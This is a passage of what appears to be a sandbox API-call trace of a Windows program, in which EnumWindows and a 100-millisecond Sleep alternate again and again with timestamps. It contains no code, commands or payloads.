(dwMilliseconds=0x64) [0130.138] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.138] Sleep (dwMilliseconds=0x64) [0130.206] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.207] Sleep (dwMilliseconds=0x64) [0130.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.249] Sleep (dwMilliseconds=0x64) [0130.263] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.263] Sleep (dwMilliseconds=0x64) [0130.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.278] Sleep (dwMilliseconds=0x64) [0130.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.294] Sleep (dwMilliseconds=0x64) [0130.311] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.312] Sleep (dwMilliseconds=0x64) [0130.330] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.330] Sleep (dwMilliseconds=0x64) [0130.350] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.351] Sleep (dwMilliseconds=0x64) [0130.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.406] Sleep (dwMilliseconds=0x64) [0130.547] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.547] Sleep (dwMilliseconds=0x64) [0130.581] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.582] Sleep (dwMilliseconds=0x64) [0130.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.594] Sleep (dwMilliseconds=0x64) [0130.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.606] Sleep (dwMilliseconds=0x64) [0130.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.625] Sleep (dwMilliseconds=0x64) [0130.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.638] Sleep (dwMilliseconds=0x64) [0130.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.653] Sleep (dwMilliseconds=0x64) [0130.718] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.719] Sleep (dwMilliseconds=0x64) [0130.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.782] Sleep (dwMilliseconds=0x64) [0130.817] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.817] Sleep (dwMilliseconds=0x64) [0130.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.825] Sleep (dwMilliseconds=0x64) [0130.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.842] Sleep (dwMilliseconds=0x64) [0130.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.856] Sleep (dwMilliseconds=0x64) [0130.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.872] Sleep (dwMilliseconds=0x64) [0130.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.888] Sleep (dwMilliseconds=0x64) [0130.907] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.907] Sleep (dwMilliseconds=0x64) [0130.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0130.971] Sleep (dwMilliseconds=0x64) [0131.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.016] Sleep (dwMilliseconds=0x64) [0131.029] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.030] Sleep (dwMilliseconds=0x64) [0131.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.050] Sleep (dwMilliseconds=0x64) [0131.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.060] Sleep (dwMilliseconds=0x64) [0131.075] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.076] Sleep (dwMilliseconds=0x64) [0131.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.093] Sleep (dwMilliseconds=0x64) [0131.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.106] Sleep (dwMilliseconds=0x64) [0131.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.122] Sleep (dwMilliseconds=0x64) [0131.186] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.187] Sleep (dwMilliseconds=0x64) [0131.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.231] Sleep (dwMilliseconds=0x64) [0131.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.247] Sleep (dwMilliseconds=0x64) [0131.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.263] Sleep (dwMilliseconds=0x64) [0131.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.280] Sleep (dwMilliseconds=0x64) [0131.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.294] Sleep (dwMilliseconds=0x64) [0131.313] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.313] Sleep (dwMilliseconds=0x64) [0131.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.325] Sleep (dwMilliseconds=0x64) [0131.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.388] Sleep (dwMilliseconds=0x64) [0131.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.437] Sleep (dwMilliseconds=0x64) [0131.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.452] Sleep (dwMilliseconds=0x64) [0131.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.466] Sleep (dwMilliseconds=0x64) [0131.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.484] Sleep (dwMilliseconds=0x64) [0131.532] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.532] Sleep (dwMilliseconds=0x64) [0131.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.606] Sleep (dwMilliseconds=0x64) [0131.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.657] Sleep (dwMilliseconds=0x64) [0131.677] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.677] Sleep (dwMilliseconds=0x64) [0131.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.685] Sleep (dwMilliseconds=0x64) [0131.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.700] Sleep (dwMilliseconds=0x64) [0131.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.719] Sleep (dwMilliseconds=0x64) [0131.740] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.744] Sleep (dwMilliseconds=0x64) [0131.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.747] Sleep (dwMilliseconds=0x64) [0131.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.765] Sleep (dwMilliseconds=0x64) [0131.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.828] Sleep (dwMilliseconds=0x64) [0131.891] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.891] Sleep (dwMilliseconds=0x64) [0131.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.903] Sleep (dwMilliseconds=0x64) [0131.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.919] Sleep (dwMilliseconds=0x64) [0131.936] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.936] Sleep (dwMilliseconds=0x64) [0131.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.950] Sleep (dwMilliseconds=0x64) [0131.969] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.969] Sleep (dwMilliseconds=0x64) [0131.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0131.982] Sleep (dwMilliseconds=0x64) [0132.063] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.063] Sleep (dwMilliseconds=0x64) [0132.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.110] Sleep (dwMilliseconds=0x64) [0132.121] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.122] Sleep (dwMilliseconds=0x64) [0132.138] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.138] Sleep (dwMilliseconds=0x64) [0132.152] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.153] Sleep (dwMilliseconds=0x64) [0132.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.169] Sleep (dwMilliseconds=0x64) [0132.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.184] Sleep (dwMilliseconds=0x64) [0132.201] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.202] Sleep (dwMilliseconds=0x64) [0132.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.216] Sleep (dwMilliseconds=0x64) [0132.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.280] Sleep (dwMilliseconds=0x64) [0132.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.327] Sleep (dwMilliseconds=0x64) [0132.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.341] Sleep (dwMilliseconds=0x64) [0132.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.356] Sleep (dwMilliseconds=0x64) [0132.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.372] Sleep (dwMilliseconds=0x64) [0132.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.388] Sleep (dwMilliseconds=0x64) [0132.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.407] Sleep (dwMilliseconds=0x64) [0132.421] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.422] Sleep (dwMilliseconds=0x64) [0132.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.483] Sleep (dwMilliseconds=0x64) [0132.558] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.558] Sleep (dwMilliseconds=0x64) [0132.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.575] Sleep (dwMilliseconds=0x64) [0132.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.595] Sleep (dwMilliseconds=0x64) [0132.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.609] Sleep (dwMilliseconds=0x64) [0132.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.626] Sleep (dwMilliseconds=0x64) [0132.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.641] Sleep (dwMilliseconds=0x64) [0132.655] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.657] Sleep (dwMilliseconds=0x64) [0132.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.671] Sleep (dwMilliseconds=0x64) [0132.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.719] Sleep (dwMilliseconds=0x64) [0132.777] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.778] Sleep (dwMilliseconds=0x64) [0132.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.797] Sleep (dwMilliseconds=0x64) [0132.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.812] Sleep (dwMilliseconds=0x64) [0132.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.829] Sleep (dwMilliseconds=0x64) [0132.844] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.845] Sleep (dwMilliseconds=0x64) [0132.868] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.868] Sleep (dwMilliseconds=0x64) [0132.885] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.885] Sleep (dwMilliseconds=0x64) [0132.910] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.910] Sleep (dwMilliseconds=0x64) [0132.958] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0132.958] Sleep (dwMilliseconds=0x64) [0133.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.017] Sleep (dwMilliseconds=0x64) [0133.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.045] Sleep (dwMilliseconds=0x64) [0133.065] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.065] Sleep (dwMilliseconds=0x64) [0133.080] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.080] Sleep (dwMilliseconds=0x64) [0133.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.090] Sleep (dwMilliseconds=0x64) [0133.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.110] Sleep (dwMilliseconds=0x64) [0133.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.188] Sleep (dwMilliseconds=0x64) [0133.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.231] Sleep (dwMilliseconds=0x64) [0133.255] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.256] Sleep (dwMilliseconds=0x64) [0133.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.262] Sleep (dwMilliseconds=0x64) [0133.282] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.282] Sleep (dwMilliseconds=0x64) [0133.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.297] Sleep (dwMilliseconds=0x64) [0133.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.310] Sleep (dwMilliseconds=0x64) [0133.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.325] Sleep (dwMilliseconds=0x64) [0133.342] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.345] Sleep (dwMilliseconds=0x64) [0133.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.406] Sleep (dwMilliseconds=0x64) [0133.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.577] Sleep (dwMilliseconds=0x64) [0133.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.625] Sleep (dwMilliseconds=0x64) [0133.708] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.708] Sleep (dwMilliseconds=0x64) [0133.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.747] Sleep (dwMilliseconds=0x64) [0133.839] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.839] Sleep (dwMilliseconds=0x64) [0133.928] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.928] Sleep (dwMilliseconds=0x64) [0133.959] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.963] Sleep (dwMilliseconds=0x64) [0133.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0133.966] Sleep (dwMilliseconds=0x64) [0134.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.063] Sleep (dwMilliseconds=0x64) [0134.119] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.120] Sleep (dwMilliseconds=0x64) [0134.134] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.134] Sleep (dwMilliseconds=0x64) [0134.139] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.139] Sleep (dwMilliseconds=0x64) [0134.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.153] Sleep (dwMilliseconds=0x64) [0134.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.169] Sleep (dwMilliseconds=0x64) [0134.185] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.186] Sleep (dwMilliseconds=0x64) [0134.229] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.230] Sleep (dwMilliseconds=0x64) [0134.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.298] Sleep (dwMilliseconds=0x64) [0134.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.344] Sleep (dwMilliseconds=0x64) [0134.361] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.361] Sleep (dwMilliseconds=0x64) [0134.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.376] Sleep (dwMilliseconds=0x64) [0134.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.388] Sleep (dwMilliseconds=0x64) [0134.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.406] Sleep (dwMilliseconds=0x64) [0134.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.419] Sleep (dwMilliseconds=0x64) [0134.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.434] Sleep (dwMilliseconds=0x64) [0134.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.450] Sleep (dwMilliseconds=0x64) [0134.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.513] Sleep (dwMilliseconds=0x64) [0134.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.606] Sleep (dwMilliseconds=0x64) [0134.622] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.622] Sleep (dwMilliseconds=0x64) [0134.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.641] Sleep (dwMilliseconds=0x64) [0134.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.656] Sleep (dwMilliseconds=0x64) [0134.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.672] Sleep (dwMilliseconds=0x64) [0134.687] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.687] Sleep (dwMilliseconds=0x64) [0134.703] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.703] Sleep (dwMilliseconds=0x64) [0134.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.719] Sleep (dwMilliseconds=0x64) [0134.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.747] Sleep (dwMilliseconds=0x64) [0134.798] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.798] Sleep (dwMilliseconds=0x64) [0134.850] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.888] Sleep (dwMilliseconds=0x64) [0134.951] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0134.951] Sleep (dwMilliseconds=0x64) [0135.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0135.672] Sleep (dwMilliseconds=0x64) [0135.803] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0135.803] Sleep (dwMilliseconds=0x64) [0135.891] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0135.891] Sleep (dwMilliseconds=0x64) [0136.268] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0136.268] Sleep (dwMilliseconds=0x64) [0136.357] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0136.358] Sleep (dwMilliseconds=0x64) [0136.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0136.606] Sleep (dwMilliseconds=0x64) [0137.466] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0137.468] Sleep (dwMilliseconds=0x64) [0137.608] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0137.608] Sleep (dwMilliseconds=0x64) [0137.772] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0137.777] Sleep (dwMilliseconds=0x64) [0137.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0137.904] Sleep (dwMilliseconds=0x64) [0138.064] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.064] Sleep (dwMilliseconds=0x64) [0138.260] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.260] Sleep (dwMilliseconds=0x64) [0138.287] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.287] Sleep (dwMilliseconds=0x64) [0138.320] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.324] Sleep (dwMilliseconds=0x64) [0138.360] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.360] Sleep (dwMilliseconds=0x64) [0138.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.805] Sleep (dwMilliseconds=0x64) [0138.857] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.857] Sleep (dwMilliseconds=0x64) [0138.904] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0138.905] Sleep (dwMilliseconds=0x64) [0139.130] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.131] Sleep (dwMilliseconds=0x64) [0139.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.250] Sleep (dwMilliseconds=0x64) [0139.283] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.283] Sleep (dwMilliseconds=0x64) [0139.376] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.376] Sleep (dwMilliseconds=0x64) [0139.424] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.424] Sleep (dwMilliseconds=0x64) [0139.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.560] Sleep (dwMilliseconds=0x64) [0139.581] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.585] Sleep (dwMilliseconds=0x64) [0139.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.590] Sleep (dwMilliseconds=0x64) [0139.635] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.635] Sleep (dwMilliseconds=0x64) [0139.682] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.682] Sleep (dwMilliseconds=0x64) [0139.712] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.712] Sleep (dwMilliseconds=0x64) [0139.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.718] Sleep (dwMilliseconds=0x64) [0139.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.734] Sleep (dwMilliseconds=0x64) [0139.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.747] Sleep (dwMilliseconds=0x64) [0139.774] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.774] Sleep (dwMilliseconds=0x64) [0139.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.778] Sleep (dwMilliseconds=0x64) [0139.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.794] Sleep (dwMilliseconds=0x64) [0139.813] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.813] Sleep (dwMilliseconds=0x64) [0139.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.829] Sleep (dwMilliseconds=0x64) [0139.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.875] Sleep (dwMilliseconds=0x64) [0139.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.922] Sleep (dwMilliseconds=0x64) [0139.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.952] Sleep (dwMilliseconds=0x64) [0139.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.966] Sleep (dwMilliseconds=0x64) [0139.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.982] Sleep (dwMilliseconds=0x64) [0139.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0139.997] Sleep (dwMilliseconds=0x64) [0140.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.013] Sleep (dwMilliseconds=0x64) [0140.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.028] Sleep (dwMilliseconds=0x64) [0140.043] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.044] Sleep (dwMilliseconds=0x64) [0140.114] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.187] Sleep (dwMilliseconds=0x64) [0140.205] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.206] Sleep (dwMilliseconds=0x64) [0140.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.219] Sleep (dwMilliseconds=0x64) [0140.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.231] Sleep (dwMilliseconds=0x64) [0140.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.295] Sleep (dwMilliseconds=0x64) [0140.351] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.352] Sleep (dwMilliseconds=0x64) [0140.442] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.443] Sleep (dwMilliseconds=0x64) [0140.460] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.461] Sleep (dwMilliseconds=0x64) [0140.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.466] Sleep (dwMilliseconds=0x64) [0140.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.481] Sleep (dwMilliseconds=0x64) [0140.498] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.498] Sleep (dwMilliseconds=0x64) [0140.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.513] Sleep (dwMilliseconds=0x64) [0140.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.528] Sleep (dwMilliseconds=0x64) [0140.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.544] Sleep (dwMilliseconds=0x64) [0140.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.560] Sleep (dwMilliseconds=0x64) [0140.574] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.575] Sleep (dwMilliseconds=0x64) [0140.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.623] Sleep (dwMilliseconds=0x64) [0140.661] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.661] Sleep (dwMilliseconds=0x64) [0140.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.763] Sleep (dwMilliseconds=0x64) [0140.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.779] Sleep (dwMilliseconds=0x64) [0140.817] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.817] Sleep (dwMilliseconds=0x64) [0140.865] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.865] Sleep (dwMilliseconds=0x64) [0140.876] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.876] Sleep (dwMilliseconds=0x64) [0140.887] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.887] Sleep (dwMilliseconds=0x64) [0140.904] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.905] Sleep (dwMilliseconds=0x64) [0140.918] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.919] Sleep (dwMilliseconds=0x64) [0140.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.934] Sleep (dwMilliseconds=0x64) [0140.949] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.950] Sleep (dwMilliseconds=0x64) [0140.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0140.966] Sleep (dwMilliseconds=0x64) [0141.025] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.025] Sleep (dwMilliseconds=0x64) [0141.064] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.065] Sleep (dwMilliseconds=0x64) [0141.087] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.088] Sleep (dwMilliseconds=0x64) [0141.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.090] Sleep (dwMilliseconds=0x64) [0141.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.106] Sleep (dwMilliseconds=0x64) [0141.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.123] Sleep (dwMilliseconds=0x64) [0141.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.137] Sleep (dwMilliseconds=0x64) [0141.166] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.167] Sleep (dwMilliseconds=0x64) [0141.221] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.222] Sleep (dwMilliseconds=0x64) [0141.267] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0141.268] Sleep (dwMilliseconds=0x64) [0141.298] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) 